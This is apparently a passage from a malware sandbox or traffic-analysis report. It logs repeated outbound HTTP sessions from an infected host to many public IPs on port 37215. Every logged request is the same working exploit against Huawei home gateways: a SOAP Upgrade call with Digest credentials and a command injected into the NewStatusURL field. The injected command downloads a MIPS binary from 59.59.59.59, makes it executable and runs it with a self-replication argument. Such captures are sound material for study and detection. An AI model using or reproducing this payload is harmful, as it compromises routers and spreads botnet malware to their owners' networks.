                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1685192.168.2.153303841.230.20.17537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.936345100 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1686192.168.2.1542892197.178.87.1437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.936356068 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1687192.168.2.1547616197.116.65.15237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.936374903 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1688192.168.2.1558572157.183.226.25237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.936388969 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1689192.168.2.1540468197.191.34.16837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.937063932 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1690192.168.2.153569264.135.143.16637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.937107086 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1691192.168.2.1552638122.98.144.7737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.937155008 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1692192.168.2.154178836.119.22.2737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.937253952 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1693192.168.2.156022241.129.209.23337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.940784931 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1694192.168.2.155133641.175.149.2237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:11.941430092 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
